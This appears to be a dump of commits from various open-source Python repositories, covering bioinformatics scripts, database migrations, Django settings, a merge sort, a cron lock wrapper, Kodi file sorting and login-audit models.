def __init__(self, where="bc*"):
self.filenames = glob.glob(where + "/" + "amplicon_*summary.csv")
self.data = [pd.read_csv(this) for this in self.filenames]
def hist_amplicon(self, fontsize=12):
data = [len(x) for x in self.data]
pylab.hist(data, bins=max(data), ec="k")
pylab.ylabel("#", fontsize=fontsize)
pylab.ylabel("Number of amplicons per barcode", fontsize=fontsize)
class LAA_Assembly():
"""
Input is a SAM/BAM from the mapping of amplicon onto a known reference.
Based on the position, we can construct the new reference.
"""
def __init__(self, filename):
self.bam = BAM(filename)
def build_reference(self):
self.bam.reset()
# scan BAM file assuming it is small
aa = [a for a in self.bam]
# retrieve data of interest
data = [(a.pos, {
"name":a.query_name,
"sequence": a.query_sequence,
"cigar": a.cigarstring,
"position": a.pos,
"qstart": a.qstart,
"qend": a.qend}) for a in aa]
# sort by starting position
data.sort(key=lambda x: x[0])
for i, read in enumerate(data):
read = read[1]
if i == 0:
sequence = read["sequence"] # 2 is query_sequence
else:
pr = data[i-1][1] # previous read
L = len(pr["sequence"])
end_position_pr = pr['position'] - pr['qstart'] + L
# overlap between previous read and this one
overlap = end_position_pr - (read['position'] - read['qstart']) +0
print(overlap)
print(pr['position'], pr['qstart'], L, end_position_pr)
print(read['position'], read['qstart'])
sequence = sequence + read["sequence"][overlap+1:]
# argmax([sum(a==b for a,b in zip(X[-i:] , Y[:i]))/float(i+1) for i in range(1000)])
return sequence
def save_fasta(self, filename, sequence=None):
if sequence is None:
sequence = self.build_reference()
with open(filename, "w") as fout:
fout.write(">test\n{}".format(sequence))
| bsd-3-clause | Python |
|
bbbe3b7d79d57e350b1203a636b6ea64fe818caa | Update migration chain | edofic/ggrc-core,AleksNeStu/ggrc-core,selahssea/ggrc-core,edofic/ggrc-core,josthkko/ggrc-core,prasannav7/ggrc-core,andrei-karalionak/ggrc-core,AleksNeStu/ggrc-core,prasannav7/ggrc-core,j0gurt/ggrc-core,j0gurt/ggrc-core,josthkko/ggrc-core,kr41/ggrc-core,josthkko/ggrc-core,NejcZupec/ggrc-core,andrei-karalionak/ggrc-core,plamut/ggrc-core,NejcZupec/ggrc-core,NejcZupec/ggrc-core,VinnieJohns/ggrc-core,selahssea/ggrc-core,j0gurt/ggrc-core,andrei-karalionak/ggrc-core,j0gurt/ggrc-core,AleksNeStu/ggrc-core,plamut/ggrc-core,VinnieJohns/ggrc-core,VinnieJohns/ggrc-core,kr41/ggrc-core,kr41/ggrc-core,edofic/ggrc-core,plamut/ggrc-core,plamut/ggrc-core,selahssea/ggrc-core,VinnieJohns/ggrc-core,edofic/ggrc-core,prasannav7/ggrc-core,kr41/ggrc-core,NejcZupec/ggrc-core,selahssea/ggrc-core,andrei-karalionak/ggrc-core,prasannav7/ggrc-core,AleksNeStu/ggrc-core,josthkko/ggrc-core | src/ggrc/migrations/versions/20160421141928_1257140cbce5_delete_responses_table.py | src/ggrc/migrations/versions/20160421141928_1257140cbce5_delete_responses_table.py | # Copyright (C) 2016 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: [email protected]
# Maintained By: [email protected]
"""Delete responses table and any other references to responses
Create Date: 2016-04-21 14:19:28.527745
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '1257140cbce5'
down_revision = '5599d1769f25'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
op.drop_constraint('meetings_ibfk_3', 'meetings', type_='foreignkey')
op.drop_column('meetings', 'response_id')
op.drop_table('responses')
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
op.create_table(
'responses',
sa.Column('title', sa.String(length=250), nullable=False),
sa.Column('request_id', sa.Integer(), nullable=False),
sa.Column(
'response_type',
sa.Enum(u'documentation', u'interview', u'population sample'),
nullable=False),
sa.Column('status', sa.String(length=250), nullable=False),
sa.Column('population_worksheet_id', sa.Integer(), nullable=False),
sa.Column('population_count', sa.Integer(), nullable=False),
sa.Column('sample_worksheet_id', sa.Integer(), nullable=False),
sa.Column('sample_count', sa.Integer(), nullable=False),
sa.Column('sample_evidence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['request_id'], ['requests.id']),
sa.ForeignKeyConstraint(['population_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_evidence_id'], ['documents.id']),
sa.Index('population_worksheet_document', 'population_worksheet_id'),
sa.Index('sample_evidence_document', 'sample_evidence_id'),
sa.Index('sample_worksheet_document', 'sample_worksheet_id')
)
op.add_column(
'meetings', sa.Column('response_id', sa.Integer(), nullable=False))
op.create_foreign_key(
'meetings_ibfk_3', 'meetings', 'responses', ['response_id'], ['id'])
| # Copyright (C) 2016 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: [email protected]
# Maintained By: [email protected]
"""Delete responses table and any other references to responses
Create Date: 2016-04-21 14:19:28.527745
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '1257140cbce5'
down_revision = '33459bd8b70d'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
op.drop_constraint('meetings_ibfk_3', 'meetings', type_='foreignkey')
op.drop_column('meetings', 'response_id')
op.drop_table('responses')
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
op.create_table(
'responses',
sa.Column('title', sa.String(length=250), nullable=False),
sa.Column('request_id', sa.Integer(), nullable=False),
sa.Column(
'response_type',
sa.Enum(u'documentation', u'interview', u'population sample'),
nullable=False),
sa.Column('status', sa.String(length=250), nullable=False),
sa.Column('population_worksheet_id', sa.Integer(), nullable=False),
sa.Column('population_count', sa.Integer(), nullable=False),
sa.Column('sample_worksheet_id', sa.Integer(), nullable=False),
sa.Column('sample_count', sa.Integer(), nullable=False),
sa.Column('sample_evidence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['request_id'], ['requests.id']),
sa.ForeignKeyConstraint(['population_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_evidence_id'], ['documents.id']),
sa.Index('population_worksheet_document', 'population_worksheet_id'),
sa.Index('sample_evidence_document', 'sample_evidence_id'),
sa.Index('sample_worksheet_document', 'sample_worksheet_id')
)
op.add_column(
'meetings', sa.Column('response_id', sa.Integer(), nullable=False))
op.create_foreign_key(
'meetings_ibfk_3', 'meetings', 'responses', ['response_id'], ['id'])
| apache-2.0 | Python |
1d3327d8d804a6e53c020e69b77efbea2086379b | Add staging settings file | ministryofjustice/manchester_traffic_offences_pleas,ministryofjustice/manchester_traffic_offences_pleas,ministryofjustice/manchester_traffic_offences_pleas,ministryofjustice/manchester_traffic_offences_pleas | manchester_traffic_offences/settings/staging.py | manchester_traffic_offences/settings/staging.py | from .base import *
import os
DEBUG = False
TEMPLATE_DEBUG = DEBUG
INSTALLED_APPS += ('raven.contrib.django.raven_compat', )
RAVEN_CONFIG = {
'dsn': os.environ['RAVEN_DSN'],
}
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['POSTGRES_DB'],
'USER': os.environ['POSTGRES_USER'],
'PASSWORD': os.environ.get('POSTGRES_PASS', ''),
'HOST': os.environ.get('POSTGRES_HOST', ''),
'PORT': os.environ.get('POSTGRES_PORT', ''),
}
}
ADMINS = (
('Ian George', '[email protected]'),
('Lyndon Garvey', '[email protected]')
)
MANAGERS = ADMINS
ALLOWED_HOSTS = ["staging.makeaplea.justice.gov.uk", ]
SESSION_COOKIE_SECURE = True
# Emails
SMTP_ROUTES["GSI"]["HOST"] = os.environ.get('GSI_EMAIL_HOST', '')
SMTP_ROUTES["GSI"]["PORT"] = int(os.environ.get('GSI_EMAIL_PORT', '25'))
EMAIL_HOST = os.environ.get('EMAIL_HOST', 'email-smtp.eu-west-1.amazonaws.com')
EMAIL_PORT = int(os.environ.get('EMAIL_PORT', '587'))
EMAIL_HOST_USER = os.environ['EMAIL_HOST_USERNAME']
EMAIL_HOST_PASSWORD = os.environ['EMAIL_HOST_PASSWORD']
EMAIL_USE_TLS = True
PLEA_EMAIL_FROM = os.environ['PLEA_EMAIL_FROM']
PLEA_EMAIL_TO = [os.environ['PLEA_EMAIL_TO'], ]
PLP_EMAIL_TO = [os.environ["PLP_EMAIL_TO"], ]
FEEDBACK_EMAIL_TO = [os.environ["FEEDBACK_EMAIL_TO"], ]
FEEDBACK_EMAIL_FROM = os.environ["FEEDBACK_EMAIL_FROM"]
| mit | Python |
|
0d2520001a0666114f9a977f6a5dc2d3ed640464 | Create parse.py | tare/Lux | BS-seq_oxBS-seq_fixed_parameters/parse.py | BS-seq_oxBS-seq_fixed_parameters/parse.py | #!/usr/bin/env python
import sys
import os
import numpy
import scipy.stats
import scipy.special
import argparse
def generate_output_files(data_file,prior_file,bsEff,bsBEff,oxEff,seqErr,prefix):
# prior for g
g_a, g_b = 2, 2/6.0
# read the input files
data = numpy.loadtxt(data_file,delimiter='\t',skiprows=0,dtype='int')
prior = numpy.loadtxt(prior_file,delimiter='\t',skiprows=0,dtype='float')
# make sure that the arrays are 2-dimensional
if len(data.shape) == 1:
data = numpy.reshape(data,[1,len(data)])
if len(prior.shape) == 1:
prior = numpy.reshape(prior,[1,len(prior)])
# check that the files were in the right format
if data.shape[1] % 4 != 0:
sys.exit('error: the number of columns in %s is not divisible by four',data_file)
if prior.shape[1] != 3:
sys.exit('error: there should be exactly three columns in %s',prior_file)
# get the number of replicates
R = data.shape[1]/4
# get the number of noncontrol cytosines
N = data.shape[0]
if len(bsEff) != R or len(bsBEff) != R or len(oxEff) != R or len(seqErr) != R:
sys.exit('error: supply experimental parameters for each replicate')
# get the number of C and total read-outs for noncontrol cytosines in BS-seq and oxBS-seq
bsC, bsTot, oxC, oxTot = data[:,0::4], data[:,1::4], data[:,2::4], data[:,3::4]
bsEff = ','.join(map(str,bsEff))
oxEff = ','.join(map(str,oxEff))
bsBEff = ','.join(map(str,bsBEff))
seqErr = ','.join(map(str,seqErr))
# print DATA
with open(prefix+'_data.R','w') as f:
f.write("bsEff <- c(%s)\noxEff <- c(%s)\nbsBEff <- c(%s)\nseqErr <- c(%s)\ng_a <- %f\ng_b <- %f\n" % (bsEff,oxEff,bsBEff,seqErr,g_a,g_b))
f.write("N <- %d\nR <- %d\n" % (N,R))
f.write("bsC <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,bsC.flatten(1))),N,R))
f.write("bsTot <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,bsTot.flatten(1))),N,R))
f.write("oxC <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,oxC.flatten(1))),N,R))
f.write("oxTot <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,oxTot.flatten(1))),N,R))
f.write("alpha <- structure(c(%s), .Dim=c(%d,%d))\n" % (','.join(map(str,prior.flatten(1))),N,3))
# sample initial values from priors
g = [numpy.random.gamma(g_a,1.0/g_b) for x in range(0,N)]
theta = ','.join(numpy.array([map(str,numpy.random.dirichlet(row)) for row in numpy.tile(prior,(R,1))]).flatten(1))
mu = ','.join(numpy.array([map(str,numpy.random.dirichlet(row)) for row in prior]).flatten(1))
# print INIT
with open(prefix+'_init.R','w') as f:
f.write("g <- c(%s)\n" % (','.join(map(str,g))))
f.write("theta <- structure(c(%s), .Dim=c(%d,%d,3))\n" % (theta,N,R))
f.write("mu <- structure(c(%s), .Dim=c(%d,3))\n" % (mu,N))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generates data and init files in the dump format for Lux')
parser.add_argument('-d','--data',action='store',dest='data',type=str,required=True,help='noncontrol cytosine data')
parser.add_argument('-p','--prior',action='store',dest='prior',type=str,required=True,help='prior of the noncontrol cytosines')
parser.add_argument('-b','--bseff',action='store',dest='bseff',type=float,nargs='+',required=True,help='bisulfite conversion efficiencies for each replicate')
parser.add_argument('-i','--bsbeff',action='store',dest='bsbeff',type=float,nargs='+',required=True,help='inaccurate bisulfite conversion efficiencies for each replicate')
parser.add_argument('-o','--oxeff',action='store',dest='oxeff',type=float,nargs='+',required=True,help='oxidation efficiencies for each replicate')
parser.add_argument('-s','--seqerr',action='store',dest='seqerr',type=float,nargs='+',required=True,help='sequencies errors for each replicate')
parser.add_argument('-pr','--prefix',action='store',dest='prefix',type=str,required=True,help='prefix of the output files')
parser.add_argument('-v','--version',action='version',version='%(prog)s 0.666')
options = parser.parse_args()
if not os.path.isfile(options.data):
sys.exit('error: %s is not a file'%(options.data))
if not os.path.isfile(options.prior):
sys.exit('error: %s is not a file'%(options.prior))
generate_output_files(options.data,options.prior,options.bseff,options.bsbeff,options.oxeff,options.seqerr,options.prefix)
| mit | Python |
|
a79a463624ab8bf62fe54d2392d4768c5a38626a | Add migration for removing challenge from Participant. (#203) | taranjeet/EvalAI,taranjeet/EvalAI,taranjeet/EvalAI,taranjeet/EvalAI | apps/participants/migrations/0003_remove_participant_challenge.py | apps/participants/migrations/0003_remove_participant_challenge.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-02 14:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('participants', '0002_participantteam_participantteammember'),
]
operations = [
migrations.RemoveField(
model_name='participant',
name='challenge',
),
]
| bsd-3-clause | Python |
|
d78b6c8d0efa3c4b29f254b7465e5e6fcb889395 | Initialize P1_multiplicationTable | JoseALermaIII/python-tutorials,JoseALermaIII/python-tutorials | books/AutomateTheBoringStuffWithPython/Chapter12/PracticeProjects/P1_multiplicationTable.py | books/AutomateTheBoringStuffWithPython/Chapter12/PracticeProjects/P1_multiplicationTable.py | # Create a program multiplicationTable.py that takes a number N from the
# command line and creates an N×N multiplication table in an Excel spreadsheet.
# Row 1 and column A should be used for labels and should be in bold.
| mit | Python |
|
58cfcfbde61859a98b317f0498f35f7b7921e41b | Add dummy FileBrowseField | sephii/mezzanine-grappelli,sephii/mezzanine-grappelli | mezzanine_grappelli/filebrowser/fields.py | mezzanine_grappelli/filebrowser/fields.py | from filebrowser.fields import FileBrowseField as BaseFileBrowseField
class FileBrowseField(BaseFileBrowseField):
pass
| bsd-2-clause | Python |
|
775104979a8ee5be040ac830133e69ca848d1ce1 | add snpPriority.py, LD score and effect size weighted SNP scoring | MikeDMorgan/gwas_pipeline,MikeDMorgan/gwas_pipeline,MikeDMorgan/gwas_pipeline,MikeDMorgan/gwas_pipeline,MikeDMorgan/gwas_pipeline | snpPriority.py | snpPriority.py | '''
snpPriority.py - score SNPs based on their LD score and SE weighted effect sizes
===============================================================================
:Author: Mike Morgan
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
.. Score SNPs based on their LD score and SE weighted effect sizes from
association analysis.
Usage
-----
.. Example use case
Example::
python snpPriority.py
Type::
python snpPriority.py --help
for command line help.
Command line options
--------------------
'''
import sys
import CGAT.Experiment as E
import PipelineGWAS as gwas
import re
import pandas as pd
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("--database", dest="database", type="string",
help="SQL database containing LD information "
"in table format. Expects columns SNP_A, "
"SNP_B, R2, BP_A and BP_B (Plink --r2 output)")
parser.add_option("--table-name", dest="table", type="string",
help="name of the SQL table containing the LD"
"values")
parser.add_option("--chromosome", dest="chromosome", type="string",
help="chromosome to subset the association results "
"file on")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
infile = argv[-1]
peek = pd.read_table(infile, nrows=5, sep=None, header=0)
if len(peek["TEST"] != "ADD"):
clean = False
else:
clean = True
snpscores = gwas.snpPriorityScore(gwas_results=infile,
database=options.database,
table_name=options.table,
chromosome=options.chromosome,
clean=clean)
snpscores.to_csv(options.stdout, index_label="SNP",
sep="\t")
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
| mit | Python |
|
80d579bd9376d955eab4a431fb3bcb493518582a | Create __init__.py | vickydasta/grammarripper | kernel/__init__.py | kernel/__init__.py | cc0-1.0 | Python |
||
6deb5c1f2f614e6e6cb420c56c250a27fa032c8b | Add undelete script | scitran/core,scitran/core,scitran/api,scitran/api,scitran/core,scitran/core | bin/undelete.py | bin/undelete.py | #!/usr/bin/env python
"""
Remove the `deleted` tag from containers (recursively) or from individual files.
"""
import argparse
import logging
import sys
import bson
from api import config
from api.dao.containerutil import propagate_changes
log = logging.getLogger('scitran.undelete')
def main():
cont_names = ['projects', 'sessions', 'acquisitions', 'analyses']
cont_names_str = '|'.join(cont_names)
ap = argparse.ArgumentParser(description=sys.modules[__name__].__doc__)
ap.add_argument('cont_name', help='container name to undelete {}'.format(cont_names_str))
ap.add_argument('cont_id', help='container id to undelete (bson.ObjectId)')
ap.add_argument('filename', nargs='?', help='filename within container (string, optional)')
args = ap.parse_args(sys.argv[1:] or ['--help'])
if args.cont_name not in cont_names:
raise ValueError('Invalid cont_name "{}" (must be one of {})'.format(args.cont_name, cont_names_str))
if not bson.ObjectId.is_valid(args.cont_id):
raise ValueError('Invalid cont_id "{}"'.format(args.cont_id))
args.cont_id = bson.ObjectId(args.cont_id)
query = {'_id': args.cont_id}
collection = config.db[args.cont_name]
container = collection.find_one(query)
if container is None:
raise RuntimeError('Cannot find {}/{}'.format(args.cont_name, args.cont_id))
update = {'$unset': {'deleted': True}}
if args.filename is None:
log.info('Removing "deleted" tag from {}/{}...'.format(args.cont_name, args.cont_id))
collection.update_one(query, update)
log.info('Removing "deleted" tag from child containers recursively...')
propagate_changes(args.cont_name, args.cont_id, None, update, include_refs=True)
else:
log.info('Removing "deleted" tag from file {}/{}/{}...'.format(args.cont_name, args.cont_id, args.filename))
for f in container.get('files', []):
if f['name'] == args.filename:
del f['deleted']
break
else:
raise RuntimeError('Cannot find {}/{}/{}'.format(args.cont_name, args.cont_id, args.filename))
collection.update_one(query, {'$set': {'files': container['files']}})
log.info('Done.')
if __name__ == '__main__':
try:
main()
except (ValueError, RuntimeError) as exc:
log.error(exc.message)
sys.exit(1)
| mit | Python |
|
d0cb340a874cc0430c8b77a0af052d8f2fd4d8c3 | test script to cache Genewiki content | SuLab/scheduled-bots,SuLab/scheduled-bots,SuLab/scheduled-bots | scheduled_bots/cache/genes/getWDHumanGenes.py | scheduled_bots/cache/genes/getWDHumanGenes.py | from wikidataintegrator import wdi_core
import pandas as pd
from rdflib import Graph
import time
import sys
query = """
SELECT * WHERE {
?item wdt:P31 wd:Q7187 ;
wdt:P703 wd:Q15978631 .
}
"""
kg = Graph()
results = wdi_core.WDItemEngine.execute_sparql_query(query)
i =0
for qid in results["results"]["bindings"]:
try:
# print(qid["item"]["value"].replace("http://www.wikidata.org/entity/", ""))
kg.parse(qid["item"]["value"]+".ttl")
i+=1
print(i)
except:
print(print(qid["item"]["value"].replace("http://www.wikidata.org/entity/", "")))
time.sleep(5)
kg.serialize(destination="diseases.ttl", format="turtle") | mit | Python |
|
4f2df78c7d8a9621340ff4ee5cfc6f22548d26d5 | add TracedThread that continues the context propagation | palazzem/ot-examples | proposal/helpers.py | proposal/helpers.py | """Helpers that are used in examples. In the current state, we may not require
to put these classes and functions as part of the main proposal.
"""
from threading import Thread
from proposal import tracer
class TracedThread(Thread):
"""Helper class OpenTracing-aware, that continues the propagation of
the current ActiveSpan in a new thread using an internal wrapper.
"""
def __init__(self, *args, **kwargs):
# implementation detail
# get the ActiveSpan when we're in the "parent" thread
self._active_span = tracer.active_span_source.active_span()
super(TracedThread, self).__init__(*args, **kwargs)
def run(self):
# implementation detail
# set the ActiveSpan in this thread and remove the local reference
tracer.active_span_source.make_active(self._active_span)
del self._active_span
super(TracedThread, self).run()
| mit | Python |
|
8f1beddb8e3d1a63df10fcde9d3faae0d8d11171 | Add kodi_automation.py | HawkMachine/kodi_automation,HawkMachine/kodi_automation,HawkMachine/kodi_automation | kodi_automation.py | kodi_automation.py |
import sys
import argparse
def Classification(paths):
return ([], [])
def MoveMoveFile(path, movies_dir, dry_run=False):
if dry_run:
sys.stderr.write('Moving movie', path)
return
def MoveEpisodeFile(path, seria, season, episode, series_dir, dry_run=False):
if dry_run:
sys.stderr.write('Moving episode', *args)
return
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--scan-dir', '-s', dest='scan_dir', default=None)
parser.add_argument('--movies-dir', dest='movies_dir', default=None)
parser.add_argument('--series-dir', dest='series_dir', default=None)
parser.add_argument('--video-exts', '-v', dest='video_exts',
default='mkv,avi,mp4')
parser.add_argument('--dry-run', dest='dry_run', default=False)
args = parser.parse_args()
video_exts = args.video_exts.split(',')
new_paths = ScanDir(args.scan_dir)
new_paths = [path for path in new_paths if any(path.endswith(ext) for ext in video_exts)]
movies_paths, episodes = Clasification(new_paths)
for movie_path in movies_paths:
print 'Moving', path, 'to', args.movies_dir
MoveMoveFile(movie_path, args.movies_dir, dry_run=args.dry_run)
for episode in episodes:
print 'Moving', episode.path, 'as', episode.seria, 'S', episode.season, 'E', episode.episode, 'to', args.series_dir
MoveEpisodeFile(
episode.path, episode.seria, episode.season, episode.episode,
args.series_dir, dry_run=args.dry_run)
if __name__ == '__main__':
main()
| mit | Python |
|
d1ca3e7363b835aeca7be2fa00cd7083d9fc8c08 | Create divide_by_year.py | hellrich/JeSemE,hellrich/JeSemE,hellrich/JeSemE,hellrich/JeSemE,hellrich/JeSemE | pipeline/preprocessing/google/divide_by_year.py | pipeline/preprocessing/google/divide_by_year.py | import glob
import gzip
import codecs
import re
import sys
import os
with_pos = False
targets = {}
my_buffer = {}
def flush(a_buffer, some_targets, a_year):
for line in a_buffer[a_year]:
some_targets[a_year].write(line)
a_buffer[a_year].clear()
if len(sys.argv) != 3:
raise Exception("Provide 2 arguments:\n\t1,Source directory with raw corpus\n\t2,Target directory for transformed corpus")
directory = sys.argv[1]
target = sys.argv[2]
if not os.path.exists(target):
os.makedirs(target)
for gziped in glob.glob(os.path.join(directory, "googlebooks-*-5gram-20120701-*.gz")):
print("Processing "+gziped)
with gzip.open(gziped, 'rb') as unpacked:
reader = codecs.getreader("utf-8")
for line in reader(unpacked):
text, year, match_count, volume_count = line.split("\t")
has_pos = "_" in text
if (with_pos and has_pos) or (not with_pos and not has_pos):
if year not in targets:
targets[year] = open(os.path.join(target,year),"w",encoding="utf-8")
my_buffer[year] = []
elif len(my_buffer[year]) > 10000:
flush(my_buffer, targets, year)
my_buffer[year].append(line)
for year in targets:
flush(my_buffer, targets, year)
targets[year].close()
| mit | Python |
|
8832a542405a1999c296cc8b55d454b8cf35b5ea | Add merge.py | bluedai180/PythonExercise,bluedai180/PythonExercise | algorithms/merge.py | algorithms/merge.py | import sys
sys.setrecursionlimit(1000000)
class Merge:
def merge_sort(self, lists):
if len(lists) <= 1:
return lists
num = len(lists) // 2
left = self.merge_sort(lists[:num])
right = self.merge_sort(lists[num:])
return self.merge(left, right)
def merge(self, left, right):
i, j = 0, 0
result = []
while i < len(left) and j < len(right):
if left[i] <= right[j]:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
result += left[i:]
result += right[j:]
return result
if __name__ == "__main__":
s = [3, 4, 1, 6, 2, 9, 7, 0, 8, 5]
merge = Merge()
print(merge.merge_sort(s))
| apache-2.0 | Python |
|
85b518638e990cb7be298ea4b533aa465dd681b5 | Add models to store data in... | GuardedRisk/Google-Apps-Auditing | acctwatch/models.py | acctwatch/models.py | from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import (
scoped_session,
sessionmaker,
relationship,
)
DBSession = scoped_session(sessionmaker())
Base = declarative_base()
class LoginItem(Base):
__table__ = Table('login_item', Base.metadata,
Column('id', Integer, primary_key=True, unique=True, autoincrement=True),
Column('guid', String, index=True),
Column('time', DateTime(timezone=True)),
Column('success', Boolean, default=False, nullable=False),
Column('failure', String, nullable=True),
Column('ip', String, nullable=False),
)
actor = relationship("Actor", backref="logins", secondary="actor_logins")
location = relationship("Location", backref="logins", secondary="login_locations")
class ActorLogins(Base):
__table__ = Table('actor_logins', Base.metadata,
Column('lid', Integer, ForeignKey('login_item.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
Column('aid', String, ForeignKey('actor.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
PrimaryKeyConstraint('lid', 'aid'),
)
class Actor(Base):
__table__ = Table('actor', Base.metadata,
Column('id', String, primary_key=True, unique=True),
Column('email', String),
)
class Location(Base):
__table__ = Table('location', Base.metadata,
Column('id', Integer, primary_key=True, unique=True),
Column('location', String(), unique=True, index=True)
)
class LoginLocation(Base):
__table__ = Table('login_locations', Base.metadata,
Column('loc_id', Integer, ForeignKey('location.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
Column('login_id', Integer, ForeignKey('login_item.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
PrimaryKeyConstraint('loc_id', 'login_id'),
)
| isc | Python |
|
42e88bc8e6d81916164e8e0fe6b8b6c476567526 | add script to integrate disambiguated results | funginstitute/patentprocessor,yngcan/patentprocessor,funginstitute/patentprocessor,nikken1/patentprocessor,nikken1/patentprocessor,nikken1/patentprocessor,funginstitute/patentprocessor,yngcan/patentprocessor,yngcan/patentprocessor | integrate.py | integrate.py | #!/usr/bin/env python
"""
Takes in a CSV file that represents the output of the disambiguation engine:
Patent Number, Firstname, Lastname, Unique_Inventor_ID
Groups by Unique_Inventor_ID and then inserts them into the Inventor table using
lib.alchemy.match
"""
import sys
import lib.alchemy as alchemy
from lib.util.csv_reader import read_file
from lib.handlers.xml_util import normalize_document_identifier
from collections import defaultdict
import cPickle as pickle
def integrate(filename):
blocks = defaultdict(list)
for line in read_file(filename):
patent_number, name_first, name_last, unique_inventor_id = line
patent_number = normalize_document_identifier(patent_number)
rawinventors = alchemy.session.query(alchemy.RawInventor).filter_by(
patent_id = patent_number,
name_first = name_first,
name_last = name_last).all()
blocks[unique_inventor_id].extend(rawinventors)
pickle.dump(blocks, open('integrate.db', 'wb'))
for block in blocks.itervalues():
alchemy.match(block)
def main():
if len(sys.argv) <= 1:
print 'USAGE: python integrate.py <path-to-csv-file>'
sys.exit()
filename = sys.argv[1]
integrate(filename)
if __name__ == '__main__':
main()
| bsd-2-clause | Python |
|
80ecafd51cf258880bb5b1e183d5dd166c2d18fc | Add lockrun.py | kmalov/lockrun | lockrun.py | lockrun.py | import optparse
import signal
import threading
import syslog
import time
import os
import re
def find_process(first_pid, process):
# Find a process in /proc
process = re.sub(" +", " ", process).strip()
m = re.compile("^[0-9]+$")
all_proc = [ x for x in os.listdir("/proc") if m.search(x)]
for p in all_proc[all_proc.index(str(first_pid)):]:
try:
with open("/proc/%s/cmdline" % p, "r") as f:
cmdline = f.readline().replace("\x00", " ").rstrip('\n').strip()
if process == cmdline:
return int(p)
except IOError:
pass
return False
def process_watcher(child_process, parent_pid, timeout):
child_pid = find_process(parent_pid, child_process)
if child_pid:
syslog.syslog(syslog.LOG_WARNING,
"""Trying to kill process "%s"[%s] by timeout(%ss)"""
% (child_process, child_pid, timeout))
os.kill(child_pid, signal.SIGTERM)
else:
syslog.syslog(syslog.LOG_WARNING,
"""Can't find task process "%s" in /proc""" % child_process)
if __name__ == "__main__":
op = optparse.OptionParser()
op.add_option("-P", "--program", dest="program", default=False, type="string")
op.add_option("-p", "--lockfile", dest="lockfile", default=False, type="string")
op.add_option("-t", "--timeout", dest="timeout", default=False, type="int")
opts, args = op.parse_args()
if opts.timeout:
watcher = threading.Timer(opts.timeout, process_watcher, [opts.program, os.getpid(), opts.timeout])
watcher.start()
# Run program
start_time = time.time()
return_code = os.system(opts.program)
total_tile = time.time() - start_time
if opts.timeout:
watcher.cancel()
syslog.syslog(syslog.LOG_NOTICE,
"""Command "%s" is done with return code: %s. Execution time %.2fs""" % (opts.program, return_code, total_tile))
| mit | Python |
|
1551cb57ab21364a4e96fa109786ccb0a4ccc3a0 | Create MergeCSVs.py | berteh/ScribusGenerator | utils/MergeCSVs.py | utils/MergeCSVs.py | # merge all columns of the csv file in current directory into a single 'merge.csv' file.
# requires pandas librairy to be installed.
# you can customize the merge in many ways: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.concat.html
import pandas as pd
import glob
dfs = glob.glob('*.csv')
result = pd.concat([pd.read_csv(df, sep=';') for df in dfs], ignore_index=True)
result.to_csv('merge.csv')
| mit | Python |
|
9b6c1af3420653124495103169865036df4f7705 | Add logging module for Pyro-related debugging | opensistemas-hub/osbrain | osbrain/logging.py | osbrain/logging.py | import os
os.environ["PYRO_LOGFILE"] = "pyro_osbrain.log"
os.environ["PYRO_LOGLEVEL"] = "DEBUG"
| apache-2.0 | Python |
|
bb188bcc196b12842378aa1c0c535800717a6b61 | add example to extract word frequencies | codeforfrankfurt/PolBotCheck,codeforfrankfurt/PolBotCheck,codeforfrankfurt/PolBotCheck,codeforfrankfurt/PolBotCheck | polbotcheck/word_frequencies.py | polbotcheck/word_frequencies.py | import nltk
from nltk.corpus import stopwords
def get_word_frequencies(text, words_n=10, lang='german'):
default_stopwords = set(nltk.corpus.stopwords.words(lang))
words = nltk.tokenize.word_tokenize(text)
words = [word for word in words if len(word) > 1]
words = [word for word in words if not word.isnumeric()]
words = [word.lower() for word in words]
words = [word for word in words if word not in default_stopwords]
fdist = nltk.FreqDist(words)
for word, frequency in fdist.most_common(words_n):
